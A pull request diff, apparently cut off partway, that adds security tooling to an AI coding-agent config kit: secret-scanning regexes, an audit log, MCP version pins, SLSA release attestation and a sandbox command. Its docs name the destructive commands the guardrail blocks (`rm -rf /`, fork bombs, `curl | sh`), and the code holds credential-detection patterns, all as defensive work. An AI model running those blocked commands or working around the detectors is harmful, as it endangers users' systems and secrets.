### PR TITLE
Security + supply-chain + DX: close gap analysis G1–G7

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -41,6 +41,12 @@ jobs:
       - name: Guardrail bypass corpus (protect-paths policy eval)
         run: bash scripts/test-protect-paths.sh
 
+      - name: Secret self-scan (no credential lands in the repo)
+        run: bash scripts/compass-scan.sh --all
+
+      - name: MCP supply-chain audit (version pins + manifest integrity)
+        run: bash scripts/check-mcp.sh
+
       - name: compass CLI tests (route · spend · impact · notify · listen parser)
         run: bash scripts/test-cli.sh
 

--- a/.github/workflows/release-sign.yml
+++ b/.github/workflows/release-sign.yml
@@ -1,0 +1,38 @@
+# release · sign + attest — on every pushed v* tag, generate a keyless SLSA build-
+# provenance attestation for the exact source tarball that Homebrew and `git` users
+# download (github …/archive/refs/tags/<tag>.tar.gz). Anyone can then verify the
+# artifact's origin with `compass verify` (or `gh attestation verify`), so a tampered
+# or look-alike tarball is detectable. The human still cuts the release (scripts/
+# release.sh); this only adds provenance to it — it never tags, merges, or deploys.
+name: "release · sign + attest"
+
+on:
+  push:
+    tags: ["v*"]
+
+permissions:
+  contents: read        # checkout only
+  id-token: write       # keyless OIDC identity for the attestation
+  attestations: write   # write the build-provenance attestation to GitHub's store
+
+jobs:
+  attest:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+
+      - name: Fetch the release source tarball (what users + Homebrew download)
+        env:
+          TAG: ${{ github.ref_name }}
+          REPO: ${{ github.repository }}
+        run: |
+          set -euo pipefail
+          url="https://github.com/${REPO}/archive/refs/tags/${TAG}.tar.gz"
+          echo "fetching $url"
+          curl -fsSL "$url" -o "compass-${TAG}.tar.gz"
+          sha256sum "compass-${TAG}.tar.gz"
+
+      - name: Attest build provenance (SLSA, keyless)
+        uses: actions/attest-build-provenance@a2bbfa25375fe432b6a289bc6b6cd05ecd0c4c32 # v4.1.0
+        with:
+          subject-path: compass-${{ github.ref_name }}.tar.gz

--- a/README.md
+++ b/README.md
@@ -111,7 +111,7 @@ brew install dshakes/compass/compass     # latest release · add --HEAD to track
 compass quickstart                       # previews, asks, then wires it into ~/.claude
 ```
 
-`brew upgrade compass` updates it; `compass --version`-style pinning comes from the tag you installed. The formula is right here in the repo — [`Formula/compass.rb`](Formula/compass.rb) — read it first.
+`brew upgrade compass` updates it; `compass --version`-style pinning comes from the tag you installed. The formula is right here in the repo — [`Formula/compass.rb`](Formula/compass.rb) — read it first. **Verify provenance** before trusting a download: `compass verify` confirms the release tarball carries a keyless [SLSA build-provenance attestation](https://slsa.dev) signed by this repo's [`release-sign.yml`](.github/workflows/release-sign.yml) workflow (needs `gh`) — a tampered or look-alike tarball is rejected.
 
 ### 📦 Git clone — *own and edit your config (recommended)*
 
@@ -429,7 +429,7 @@ Hooks are the part that runs *for* you on every action — the difference betwee
 
 | Hook | Fires | What it does for you |
 |---|---|---|
-| **`protect-paths`** | before a command runs | **Blocks** secret writes, `rm -rf /` `~` `$HOME`, fork bombs, `curl \| sh`, and force-push / hard-reset to `main` — while letting real subpaths like `./build` through. The policy is [data-driven and **eval-gated**](docs/16-hardening-and-frontier.md): an 85-case bypass corpus + a `compass bench` precision/recall floor run in CI, so split-flag, quoted-`$HOME`, `find -delete`, `+refspec`-force and `curl\|zsh` variants don't slip through |
+| **`protect-paths`** | before a command runs | **Blocks** secret writes, **secrets pasted *into* a file's content** (Anthropic/OpenAI/AWS/GitHub… key formats — caught before the write lands), `rm -rf /` `~` `$HOME`, fork bombs, `curl \| sh`, and force-push / hard-reset to `main` — while letting real subpaths like `./build` through. The policy is [data-driven and **eval-gated**](docs/16-hardening-and-frontier.md): a bypass corpus + a `compass bench` precision/recall floor run in CI, so split-flag, quoted-`$HOME`, `find -delete`, `+refspec`-force and `curl\|zsh` variants don't slip through. Pairs with **`compass scan`** for the commit boundary |
 | **`format-on-edit`** | after every edit | Formats the file with its canonical formatter (gofmt, rustfmt, prettier/biome, ruff, shfmt, terraform, buf) — clean diffs, zero effort |
 | **`inject-context`** | at session start | Hands the agent the branch, dirty state, and recent commits up front, so it starts oriented |
 | **`notify`** | on finish / waiting | A desktop ping when a turn completes or needs your input (macOS / Linux) |
@@ -458,11 +458,16 @@ Hooks are the part that runs *for* you on every action — the difference betwee
 | **`compass status`** `[dir]` | **Is compass enabled here?** Shows the global config plus this repo's per-repo extras. |
 | **`compass onboard`** `[dir]` · `--all <glob>` | Detect the stack → install deps → get build + test green → write a grounded `CLAUDE.md` → print a codebase map. `--all` does many repos with a per-repo budget cap. |
 | **`compass impact`** | **What compass saved you:** footguns blocked, files auto-formatted, spend by model, and an estimated `$` saved versus running everything on Opus. |
+| **`compass audit-log`** `[--since\|--json]` | **The security trail.** Every gated action (secret write, dangerous command, scan hit) is one JSON line in `audit.jsonl` — tool · rule · decision · redacted detail. Turns "N footguns blocked" into evidence you can show a security team or pipe to a SIEM. |
 | **`compass spend`** `[--week\|--month]` | Agent cost rolled up by model and repo, against a budget (`COMPASS_BUDGET_USD`). |
 | **`compass route`** `"<task>"` · `--eval` · `--score` | Picks the cheapest-correct model tier for a task. `--eval` scores the picker against a labeled set (CI-gated); `--score` adds a confidence + cost-aware budget bias. |
 | **`compass dashboard`** `[--html]` | **Mission control:** one read-only panel of impact + spend + **live fleet PR state** (via `gh`). `--html` writes a shareable page. No service, no upload. |
 | **`compass bench`** `[--guardrail\|--router]` | **Reproducible scorecard:** guardrail precision/recall + router accuracy — deterministic and CI-gated, so the claims are numbers, not adjectives. |
 | **`compass sbom`** `[--gate]` | Dependency SBOM + native vuln audit (npm/go/cargo/pip/syft). `--gate` fails on known vulns. |
+| **`compass drift`** `[--json]` | **Is the install still faithful to the source?** Diffs `~/.claude` (and `~/.codex`) against the repo — clobbered/repointed symlinks, hand-edited or stale copies, dangling links, and a guardrail hook that lost its `+x` bit (a silently-disabled safety net). The question `doctor`'s existence check can't answer. |
+| **`compass scan`** `[--staged\|--diff\|--all]` | **Secret scanning at the commit boundary** — the companion to the write-hook. High-precision built-in detectors (Anthropic/OpenAI/AWS/GitHub/GCP/Slack/Stripe… keys) are the deterministic gate; uses `gitleaks` for extra depth if installed. Exits non-zero on a hit, so it drops into a pre-commit hook or CI. Mark a deliberate placeholder with an `allowlist secret` comment. |
+| **`compass sandbox`** `-- CMD` | **A real containment boundary** (unlike the footgun-reducing hooks): runs `CMD` with **no network** and writes confined to cwd + temp, via bubblewrap / firejail / macOS `sandbox-exec`. For untrusted code — a downloaded build, a script you didn't write. Refuses rather than run unconfined if no backend exists. |
+| **`compass verify`** `[vX.Y.Z\|FILE]` | **Release provenance:** confirms a tarball carries the keyless SLSA attestation built by `release-sign.yml` (needs `gh`). A tampered or look-alike tarball is rejected. |
 | **`compass policy-synth`** | **Fleet brain:** clusters recurring review findings into *proposed* CLAUDE.md rules — you accept them; it never edits the manual. |
 | **`compass schedule`** `add\|run <routine>` | Local cron agents that open PRs/issues and never merge: `dep-refresh` · `flaky-triage` · `doc-freshness` · `pr-babysit`. |
 | **`compass doctor`** | Validate the whole install (JSON, hooks, plugin sync, guardrail corpus, actions audit, executability). |
@@ -481,6 +486,7 @@ compass plugs your agent into live context and other tools — and bends easily 
 
 - **Auto-registered, secret-free:** **`context7`** (up-to-date library docs, so the agent stops hallucinating old APIs) · **`fetch`** (URL → markdown) · **`git`** (structured git operations).
 - **Opt-in:** **`github`** (issues/PRs over OAuth) · **`postgres`** (read-only, project-scoped) · **`browser`** (drive a real browser via Playwright) · **`compass-memory`** (durable, cross-repo learnings, local SQLite v1).
+- **Version-pinned supply chain.** Every executable server is pinned to an explicit version (never `@latest`), so a compromised upstream release isn't auto-pulled. [`scripts/check-mcp.sh`](scripts/check-mcp.sh) enforces it — pins present + matching `args`, and no shell-injection markers in the manifest (tamper defense against [tool-poisoning](https://www.truefoundry.com/blog/blog-mcp-tool-poisoning-gateway-defense)) — and runs in `setup-mcp` pre-flight, `doctor`, and CI.
 
 **Language-server intelligence (LSP).** An opt-in companion plugin gives Claude background **diagnostics + navigation at zero context cost** for Go, Rust, TypeScript, and Python — install it with `/plugin install core-lsp@compass` (needs `gopls` / `rust-analyzer` / `typescript-language-server` / `pyright` on PATH). → [LSP guide](docs/06-lsp.md)
 

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -6,9 +6,20 @@ subagents, commands, skills, MCP/LSP wiring, and an installer. It ships shell
 scripts that run on your machine and a `PreToolUse` guardrail.
 
 **The guardrail hooks reduce footguns; they are not a security boundary.** They
-stop common accidents (secret writes, `rm -rf /`, `curl|sh`, force-push to `main`),
-not a determined attacker or a cleverly-phrased command. Keep using least-privilege
-credentials and review diffs.
+stop common accidents (secret writes, secrets pasted into file *content*, `rm -rf /`,
+`curl|sh`, force-push to `main`), not a determined attacker or a cleverly-phrased
+command. Keep using least-privilege credentials and review diffs. **When you need an
+actual boundary** — running untrusted code, a downloaded build, an agent executing a
+script you didn't write — use `compass sandbox -- <cmd>`: a real OS sandbox (bwrap /
+firejail / macOS sandbox-exec) with no network and writes confined to cwd + temp. It
+refuses rather than run unconfined if no backend is available (no fake sandboxing).
+
+**Secret scanning has two layers.** The `protect-paths` write-hook blocks an agent
+from writing a recognizable live credential (Anthropic/OpenAI/AWS/GitHub/GCP/Slack/
+Stripe… formats) into a file. `compass scan [--staged|--all]` is the commit-boundary
+companion — run it in a pre-commit hook or CI; its built-in detectors are the
+deterministic gate and it uses `gitleaks` for extra depth when installed. Both honor
+an `allowlist secret` marker on a line for deliberate placeholders/fixtures.
 
 ## What talks to the network (egress)
 compass itself phones home to nothing. Network calls happen only through tools you enable:
@@ -26,6 +37,21 @@ compass itself phones home to nothing. Network calls happen only through tools y
 | **Local model — Ollama/LM Studio** | `codex --profile local` | opt-in; **local only**, no egress |
 
 No telemetry. The `compass-memory` MCP is **local-only** (SQLite over stdio, no network). compass modifies shared files only by symlinking config into `~/.claude`, `~/.codex`, and (with `--gemini`) `~/.gemini` (backed up; `make uninstall` reverts all three). No feature uses `--dangerously-skip-permissions`.
+
+## Audit trail
+Every blocked/gated action is appended to `${COMPASS_HOME:-~/.compass}/audit.jsonl`
+(one JSON object per line: ts · decision · tool · repo · rule · redacted detail). Read
+it with `compass audit-log` (table, `--since`, or `--json` for SIEM export). Details are
+redacted reasons — never the raw secret or payload.
+
+## Supply chain & release provenance
+- **MCP servers are version-pinned** (never `@latest`); `scripts/check-mcp.sh` enforces
+  pins + manifest integrity in `setup-mcp` pre-flight, `doctor`, and CI, so a compromised
+  upstream release isn't auto-pulled.
+- **Releases carry provenance.** Every `v*` tag triggers `release-sign.yml`, which emits a
+  keyless [SLSA build-provenance attestation](https://slsa.dev) for the source tarball.
+  Verify any download with `compass verify [vX.Y.Z]` (or `gh attestation verify <tarball>
+  --repo dshakes/compass`). The Homebrew formula additionally pins the tarball `sha256`.
 
 ## Reporting a vulnerability
 Please report security issues **privately** — do not open a public issue.

--- a/bin/compass
+++ b/bin/compass
@@ -28,6 +28,8 @@ usage: compass <command> [args]
   quickstart [flags]       Install + validate + the 60-second on-ramp (idempotent;
                            re-run to repair). Pass-through: --mcp --gemini --copy --yes.
   status  [DIR]            Is compass enabled here? Global config + this-repo extras.
+  drift   [--json]         Does the installed config still match the repo source?
+                           Catches clobbered/stale/hand-edited installs + non-+x hooks.
   onboard [DIR] | --all <glob>
                            Onboard into a repo: detect stack, deps, build+test green,
                            write a grounded CLAUDE.md, print a codebase map. --all does many.
@@ -49,11 +51,22 @@ usage: compass <command> [args]
   sbom    [--no-audit|--gate|--json]
                            Dependency SBOM + native vuln audit (npm/pip/go/cargo/syft).
                            --gate exits non-zero on known vulns (CI/QA use).
+  scan    [--staged|--diff|--all] [PATH...]
+                           Find secrets before they're committed (pre-commit / CI).
+                           Built-in detectors gate; uses gitleaks for depth if present.
+  verify  [vX.Y.Z|FILE]    Verify a release tarball's provenance (keyless SLSA
+                           attestation built by release-sign.yml). Needs gh. No arg = latest.
+  sandbox [--net allow] [--rw DIR] -- CMD...
+                           Run CMD in a REAL OS sandbox (no network + writes confined to
+                           cwd/tmp) via bwrap/firejail/sandbox-exec. For untrusted code.
   notify  "<message>"      DM your phone: Slack·Discord·Telegram·iMessage/WhatsApp
                            (set COMPASS_NOTIFY_URL/_TOKEN; --dry-run to preview).
   listen                   Run the command listener: act on /status /approve /hold /build
                            from your phone DM via Telegram (free) or an iMessage/WhatsApp bridge
                            (long-running daemon; needs gh + a configured transport).
+  audit-log [--since D] [-n N] [--json]
+                           The security trail: every blocked footgun (secret write,
+                           dangerous command, scan hit) as a queryable JSONL record.
   doctor                   Validate the compass install (make doctor).
   release [vX.Y.Z|--dry-run]
                            Finish a release: push the tag, pin the Homebrew sha, publish the
@@ -69,6 +82,7 @@ run() { local s="$SCRIPTS/compass-$1.sh"; shift; [ -x "$s" ] || { echo "compass:
 case "$cmd" in
   quickstart) exec "$ROOT/quickstart.sh" "$@" ;;
   status)   run status "$@" ;;
+  drift)    run drift "$@" ;;
   onboard)  run onboard "$@" ;;
   impact)   run impact "$@" ;;
   dashboard) run dashboard "$@" ;;
@@ -78,8 +92,12 @@ case "$cmd" in
   bench)    run bench "$@" ;;
   policy-synth) run policy-synth "$@" ;;
   sbom)     run sbom "$@" ;;
+  scan)     run scan "$@" ;;
+  verify)   exec "$SCRIPTS/verify-release.sh" "$@" ;;
+  sandbox)  run sandbox "$@" ;;
   notify)   run notify "$@" ;;
   listen)   command -v node >/dev/null || { echo "compass listen: node required" >&2; exit 1; }; exec node "$SCRIPTS/compass-listen.mjs" "$@" ;;
+  audit-log) run audit-log "$@" ;;
   doctor)   exec make -C "$ROOT" doctor ;;
   release)  exec "$SCRIPTS/release.sh" "$@" ;;
   -h|--help|help) usage ;;

--- a/claude/hooks/lib/common.sh
+++ b/claude/hooks/lib/common.sh
@@ -44,11 +44,49 @@ print(cur if isinstance(cur, str) else json.dumps(cur))
   printf '%s' "$json" | grep -o "\"$key\"[[:space:]]*:[[:space:]]*\"[^\"]*\"" | head -1 | sed 's/.*:[[:space:]]*"\(.*\)"/\1/'
 }
 
+# Extract the author-written TEXT from a file-writing tool's input — Write(.content),
+# Edit(.new_string), and every MultiEdit(.edits[].new_string) — with REAL newlines,
+# so a line-oriented content scanner sees true lines (not a jq-collapsed blob where
+# one placeholder marker could mask a real secret on another line). Empty if none.
+json_write_text() {
+  local json="$1"
+  if command -v jq >/dev/null 2>&1; then
+    printf '%s' "$json" | jq -r '
+      [ .tool_input.content, .tool_input.new_string, (.tool_input.edits[]?.new_string) ]
+      | map(select(. != null)) | .[]' 2>/dev/null
+    return 0
+  fi
+  if command -v python3 >/dev/null 2>&1; then
+    printf '%s' "$json" | python3 -c '
+import sys, json
+try:
+    d = json.load(sys.stdin).get("tool_input", {})
+except Exception:
+    sys.exit(0)
+parts = []
+for k in ("content", "new_string"):
+    v = d.get(k)
+    if isinstance(v, str):
+        parts.append(v)
+for e in (d.get("edits") or []):
+    if isinstance(e, dict) and isinstance(e.get("new_string"), str):
+        parts.append(e["new_string"])
+sys.stdout.write("\n".join(parts))
+' 2>/dev/null
+    return 0
+  fi
+  # No JSON parser: fall back to the raw payload (single-line tokens still match).
+  printf '%s' "$json"
+}
+
 # Emit a PreToolUse deny decision (stdout JSON) and exit 2 (block).
 # Usage: deny "human-readable reason"
+# Writes BOTH the impact metric (a counter) and a structured audit record (the trail).
+# The caller may set COMPASS_AUDIT_TOOL / COMPASS_AUDIT_RULE for richer attribution.
 deny() {
   local reason="$1"
   compass_log_metric block "$reason"
+  compass_log_audit deny "${COMPASS_AUDIT_TOOL:-?}" "${COMPASS_AUDIT_RULE:-guardrail}" "$reason"
   cat <<JSON
 {"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"deny","permissionDecisionReason":$(json_string "$reason")}}
 JSON
@@ -91,4 +129,17 @@ compass_log_metric() {
   { mkdir -p "$home" 2>/dev/null && printf '%s\t%s\t%s\t%s\n' \
       "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$event" "$repo" "$detail" \
       >>"$home/metrics.tsv"; } 2>/dev/null || true
+}
+
+# Append a structured security-audit record (one JSON object per line) for a gated or
+# blocked action — a queryable, SIEM-exportable trail beyond the impact counters.
+# `compass audit-log` reads it. Fields: ts, decision, tool, repo, rule, detail (the
+# detail is a redacted reason — never the raw secret/payload). Never fails the caller.
+compass_log_audit() {
+  local decision="$1" tool="${2:-?}" rule="${3:-?}" detail="${4:-}" home="${COMPASS_HOME:-$HOME/.compass}" repo
+  repo="$(basename "$(git rev-parse --show-toplevel 2>/dev/null || echo "$PWD")")"
+  { mkdir -p "$home" 2>/dev/null && printf '{"ts":%s,"decision":%s,"tool":%s,"repo":%s,"rule":%s,"detail":%s}\n' \
+      "$(json_string "$(date -u +%Y-%m-%dT%H:%M:%SZ)")" "$(json_string "$decision")" "$(json_string "$tool")" \
+      "$(json_string "$repo")" "$(json_string "$rule")" "$(json_string "$detail")" \
+      >>"$home/audit.jsonl"; } 2>/dev/null || true
 }

--- a/claude/hooks/lib/policy.sh
+++ b/claude/hooks/lib/policy.sh
@@ -23,6 +23,29 @@ POLICY_PROTECTED_BRANCHES="main master release production prod develop staging"
 # A *deeper* path (e.g. /usr/local/share/foo) is allowed — only the dir itself or its glob.
 POLICY_SYSTEM_DIRS="/usr /etc /var /bin /sbin /lib /lib64 /lib32 /boot /dev /proc /sys /opt /root /home /System /Library"
 
+# Inline-secret detectors: "name|ERE", one per line. HIGH PRECISION by design —
+# secret_content_findings() runs on the write hot path (protect-paths blocks a
+# Write/Edit that introduces a match), so it only matches structured, unambiguous
+# credential formats, never generic high-entropy strings. Broader/entropy scanning
+# lives in `compass scan` (off the hot path; can shell out to gitleaks).
+POLICY_SECRET_DETECTORS='anthropic-api-key|sk-ant-[A-Za-z0-9_-]{20,}
+openai-api-key|sk-(proj-)?[A-Za-z0-9_-]{32,}
+aws-access-key-id|(AKIA|ASIA)[0-9A-Z]{16}
+aws-secret-access-key|aws_secret_access_key[^A-Za-z0-9]{1,4}[A-Za-z0-9/+]{40}
+gcp-api-key|AIza[0-9A-Za-z_-]{35}
+github-token|gh[posru]_[A-Za-z0-9]{36,}
+github-pat|github_pat_[0-9A-Za-z_]{60,}
+gitlab-pat|glpat-[0-9A-Za-z_-]{20,}
+slack-token|xox[baprs]-[0-9A-Za-z-]{10,}
+stripe-secret-key|[sr]k_live_[0-9A-Za-z]{16,}
+npm-token|npm_[0-9A-Za-z]{36}
+private-key-block|-----BEGIN [A-Z0-9 ]*PRIVATE KEY-----'
+
+# Markers that neutralise a match on the SAME line — placeholders, AWS's documented
+# EXAMPLE key, doc fences, and an explicit `allowlist secret` pragma — so READMEs,
+# fixtures, and templates don't trip the guardrail.
+POLICY_SECRET_ALLOW='allowlist[ _-]?secret|EXAMPLE|example\.com|placeholder|REDACTED|dummy|sample|\bfake|your[_-]|YOUR_|<[A-Za-z0-9_]|xxxxxxxx|\.\.\.'
+
 # ── helpers ──────────────────────────────────────────────────────────────────
 
 # Strip quotes and a trailing slash / glob from a token, so "/usr/", '/usr/*',
@@ -163,4 +186,25 @@ danger_reason() {
   fi
 
   return 0
+}
+
+# ── inline secret content ──────────────────────────────────────────────────────
+# secret_content_findings "<text>"  -> one "rule: redacted…" line per detected
+# secret (empty output = clean). Scans the WHOLE blob once per detector (cost is
+# O(detectors), not O(lines)), so it stays cheap on the write hot path. A match is
+# dropped if its line also carries an allowlist marker, so placeholders and the
+# documented AWS EXAMPLE key never trip it. Tokens are redacted to their first 4
+# chars — a finding tells you the *kind* of secret, never reprints the secret.
+secret_content_findings() {
+  local text="$1" name re hit
+  [ -n "$text" ] || return 0
+  printf '%s\n' "$POLICY_SECRET_DETECTORS" | while IFS='|' read -r name re; do
+    [ -n "$name" ] || continue
+    # matching lines → drop allowlisted lines → extract the offending token
+    hit="$(printf '%s\n' "$text" \
+      | grep -E -- "$re" 2>/dev/null \
+      | grep -Eiv -- "$POLICY_SECRET_ALLOW" 2>/dev/null \
+      | grep -Eo -- "$re" 2>/dev/null | head -1)"
+    [ -n "$hit" ] && printf '%s: %s…\n' "$name" "$(printf '%s' "$hit" | cut -c1-4)"
+  done
 }

--- a/claude/hooks/protect-paths.sh
+++ b/claude/hooks/protect-paths.sh
@@ -30,11 +30,23 @@ TOOL="$(json_get "$INPUT" '.tool_name')"
 # --- File-writing tools: protect secrets and credential stores ----------------
 case "$TOOL" in
   Edit|Write|NotebookEdit|MultiEdit)
+    COMPASS_AUDIT_TOOL="$TOOL"
     FILE="$(json_get "$INPUT" '.tool_input.file_path')"
     [ -z "$FILE" ] && FILE="$(json_get "$INPUT" '.tool_input.notebook_path')"
     [ -z "$FILE" ] && exit 0
     reason="$(secret_file_reason "$FILE")"
-    [ -n "$reason" ] && deny "$reason"
+    [ -n "$reason" ] && { COMPASS_AUDIT_RULE="secret-file-write"; deny "$reason"; }
+    # Inline-secret scan of the content being written (high-precision). Pulls the
+    # real author text (Write.content / Edit.new_string / MultiEdit.edits) with true
+    # newlines, so the per-line allowlist is honest: a placeholder line ('allowlist
+    # secret', EXAMPLE, <...>) is exempt; a real-looking credential elsewhere is still
+    # blocked before it reaches the file.
+    findings="$(secret_content_findings "$(json_write_text "$INPUT")")"
+    if [ -n "$findings" ]; then
+      summary="$(printf '%s' "$findings" | tr '\n' ' ')"
+      COMPASS_AUDIT_RULE="secret-in-content"
+      deny "Refusing to write a file that contains what looks like a live secret — $summary. If it's a placeholder, add an 'allowlist secret' marker on that line; if it's real, keep it out of the repo (env var / secret store)."
+    fi
     exit 0 ;;
 esac
 
@@ -53,7 +65,7 @@ if [ "$TOOL" = "Bash" ]; then
   export POLICY_CURRENT_BRANCH
 
   reason="$(danger_reason "$CMD")"
-  [ -n "$reason" ] && deny "$reason"
+  [ -n "$reason" ] && { COMPASS_AUDIT_TOOL="Bash"; COMPASS_AUDIT_RULE="dangerous-command"; deny "$reason"; }
 fi
 
 exit 0

--- a/claude/skills/harden/SKILL.md
+++ b/claude/skills/harden/SKILL.md
@@ -1,0 +1,80 @@
+---
+name: harden
+description: Run the toolkit's security commands in order to surface secrets, MCP supply-chain issues, install drift, release provenance gaps, and untrusted-code risks before shipping. Use before opening a PR, after adding a dependency, or whenever the security posture needs a fresh check.
+argument-hint: "[optional: -- <cmd> to sandbox-test a specific command]"
+allowed-tools: Read, Grep, Glob, Bash
+---
+
+# Harden — security sweep in five ordered steps
+
+Run each command in sequence. Stop on a non-zero exit and fix the finding before
+proceeding. All five must pass before the branch is considered hardened.
+
+## Steps
+
+### 1 · Secrets — `compass scan --staged`
+Scan the staged diff for secrets at the commit boundary.
+
+```
+compass scan --staged
+```
+
+Exits 0 (clean) or 1 (secrets found). Fix: remove the secret, rotate the
+credential, then re-stage. Add an `# allowlist secret` comment ONLY for
+confirmed test fixtures — never real credentials.
+
+### 2 · MCP supply-chain pins — `scripts/check-mcp.sh`
+Verify every auto-installed MCP server is pinned to an exact version and that
+no `@latest` float or shell-injection marker has crept in.
+
+```
+bash scripts/check-mcp.sh
+```
+
+Exits 0 (pinned + clean) or non-zero (floating version or injection marker).
+Fix: pin the version in `mcp/servers.json` and re-run. (`setup-mcp.sh` runs this
+same audit as a pre-flight, and `compass doctor` includes it.)
+
+### 3 · Install fidelity — `compass drift`
+Check that the installed `~/.claude` config still matches this repo's source.
+Catches hand-edited copies, stale hooks, and non-executable guardrail scripts.
+
+```
+compass drift
+```
+
+Exits 0 (in sync) or non-zero (drift detected). Fix: re-run `quickstart.sh`
+or remove the hand-edited file and let the install re-link it.
+
+### 4 · Release provenance — `compass verify`
+Verify the latest release tarball's keyless SLSA attestation. Requires `gh`.
+
+```
+compass verify
+```
+
+Exits 0 (attestation valid), 77 (gh lacks attestation support — skip), or
+non-zero (attestation missing or invalid). A 77 is a safe skip on old gh
+versions; anything else is a provenance gap to investigate.
+
+### 5 · Untrusted code — `compass sandbox -- <cmd>`
+Run any untrusted command inside a real OS sandbox (no network, writes confined
+to cwd/tmp via bwrap/firejail/sandbox-exec). Required before executing code
+fetched from external sources.
+
+```
+compass sandbox -- <cmd>
+```
+
+Exits 0 (ran confined), 2 (usage error — supply a command), or non-zero if the
+sandboxed command itself fails. If no backend is available the CLI refuses to
+run the command unconfined — install bwrap or firejail first.
+
+## Notes
+- Run the five steps in order; each one gates the next in severity.
+- `compass scan --staged` should also be wired as a pre-commit hook
+  (`compass scan --staged` in `.git/hooks/pre-commit`) for continuous coverage.
+- Security (`compass scan`, `compass verify`) and drift detection (`compass drift`)
+  are also surfaced in `compass dashboard` for a fleet-wide view.
+- This skill does not replace a full `/security-review` — it gates the mechanical
+  checks. Run `/security-review` on the diff for human-judgment findings.

--- a/mcp/compass-memory/test_store.py
+++ b/mcp/compass-memory/test_store.py
@@ -31,12 +31,12 @@ check("explicit deny", store.trust_tier("evil", TRUST), "deny")
 # secret detection
 check(
     "anthropic key is secret",
-    store.looks_secret("key sk-ant-oat01-abcdefghijklmnop"),
+    store.looks_secret("key sk-ant-oat01-abcdefghijklmnop"),  # allowlist secret
     True,
 )
 check(
     "github token is secret",
-    store.looks_secret("ghp_0123456789abcdefghijABCDEFG"),
+    store.looks_secret("ghp_0123456789abcdefghijABCDEFG"),  # allowlist secret
     True,
 )
 check("password kv is secret", store.looks_secret("password = hunter2"), True)

--- a/mcp/servers.json
+++ b/mcp/servers.json
@@ -1,5 +1,6 @@
 {
   "_comment": "Single source of truth for MCP servers across Claude Code and Codex. scripts/setup-mcp.sh reads this and registers each server in both tools (Claude: `claude mcp add-json --scope user`; Codex: appended [mcp_servers.*] in ~/.codex/config.toml). Secrets are referenced via ${ENV} expansion, never baked in. Servers with autoRegister:false are documented opt-ins (need a secret or a remote/OAuth flow) — see docs/04-mcp.md.",
+  "_pinning": "Every executable server is pinned to an explicit version (the 'pin' field, baked into args) — never `@latest` or a bare floating spec. This is the supply-chain control: a compromised upstream release (tool-poisoning, CVE-2025-54136) is not auto-pulled. scripts/check-mcp.sh enforces it (auto-registered servers MUST be pinned, pin must match args, no injection markers in any field) and runs in doctor + CI. To bump: change pin + args together and re-run check-mcp.",
   "servers": {
     "context7": {
       "autoRegister": true,
@@ -8,7 +9,8 @@
       "description": "Up-to-date, version-correct documentation and code examples for any library. Frontier: kills 'trained on an old API' hallucinations.",
       "type": "stdio",
       "command": "npx",
-      "args": ["-y", "@upstash/context7-mcp"],
+      "pin": "3.1.0",
+      "args": ["-y", "@upstash/context7-mcp@3.1.0"],
       "env": {},
       "note": "Works without a key; set CONTEXT7_API_KEY for higher rate limits."
     },
@@ -19,7 +21,8 @@
       "description": "Fetch a URL and return clean, model-ready markdown. Gives Codex web-fetch parity with Claude's WebFetch.",
       "type": "stdio",
       "command": "uvx",
-      "args": ["mcp-server-fetch"],
+      "pin": "2025.4.7",
+      "args": ["--from", "mcp-server-fetch==2025.4.7", "mcp-server-fetch"],
       "env": {}
     },
     "git": {
@@ -29,7 +32,8 @@
       "description": "Structured local git operations (status, diff, log, blame, show) as typed tools rather than parsed shell output.",
       "type": "stdio",
       "command": "uvx",
-      "args": ["mcp-server-git"],
+      "pin": "2026.1.14",
+      "args": ["--from", "mcp-server-git==2026.1.14", "mcp-server-git"],
       "env": {}
     },
     "github": {
@@ -50,7 +54,8 @@
       "description": "Read-only SQL over a Postgres database (schema introspection + SELECT). Best as a PROJECT server (e.g. project), gated on ${PROJECT_DATABASE_URL}.",
       "type": "stdio",
       "command": "npx",
-      "args": ["-y", "@modelcontextprotocol/server-postgres", "${PROJECT_DATABASE_URL}"],
+      "pin": "0.6.2",
+      "args": ["-y", "@modelcontextprotocol/server-postgres@0.6.2", "${PROJECT_DATABASE_URL}"],
       "env": {},
       "note": "Point at a read-replica or a read-only role. Never a write-capable prod credential."
     },
@@ -61,7 +66,8 @@
       "description": "Drive a real browser (navigate, click, type, screenshot, extract) via Playwright. The sanctioned 'browser agent' — opt-in, for UI verification / scraping / repro of web bugs.",
       "type": "stdio",
       "command": "npx",
-      "args": ["-y", "@playwright/mcp@latest"],
+      "pin": "0.0.75",
+      "args": ["-y", "@playwright/mcp@0.0.75"],
       "env": {},
       "setup": "npx playwright install chromium   # one-time browser download, then enable in scripts/setup-mcp.sh",
       "note": "Off by default — it can act on live sites. Use deliberately; scope to trusted pages. The agent that drives it still follows the same guardrails."

--- a/plugins/core/hooks/lib/common.sh
+++ b/plugins/core/hooks/lib/common.sh
@@ -44,11 +44,49 @@ print(cur if isinstance(cur, str) else json.dumps(cur))
   printf '%s' "$json" | grep -o "\"$key\"[[:space:]]*:[[:space:]]*\"[^\"]*\"" | head -1 | sed 's/.*:[[:space:]]*"\(.*\)"/\1/'
 }
 
+# Extract the author-written TEXT from a file-writing tool's input — Write(.content),
+# Edit(.new_string), and every MultiEdit(.edits[].new_string) — with REAL newlines,
+# so a line-oriented content scanner sees true lines (not a jq-collapsed blob where
+# one placeholder marker could mask a real secret on another line). Empty if none.
+json_write_text() {
+  local json="$1"
+  if command -v jq >/dev/null 2>&1; then
+    printf '%s' "$json" | jq -r '
+      [ .tool_input.content, .tool_input.new_string, (.tool_input.edits[]?.new_string) ]
+      | map(select(. != null)) | .[]' 2>/dev/null
+    return 0
+  fi
+  if command -v python3 >/dev/null 2>&1; then
+    printf '%s' "$json" | python3 -c '
+import sys, json
+try:
+    d = json.load(sys.stdin).get("tool_input", {})
+except Exception:
+    sys.exit(0)
+parts = []
+for k in ("content", "new_string"):
+    v = d.get(k)
+    if isinstance(v, str):
+        parts.append(v)
+for e in (d.get("edits") or []):
+    if isinstance(e, dict) and isinstance(e.get("new_string"), str):
+        parts.append(e["new_string"])
+sys.stdout.write("\n".join(parts))
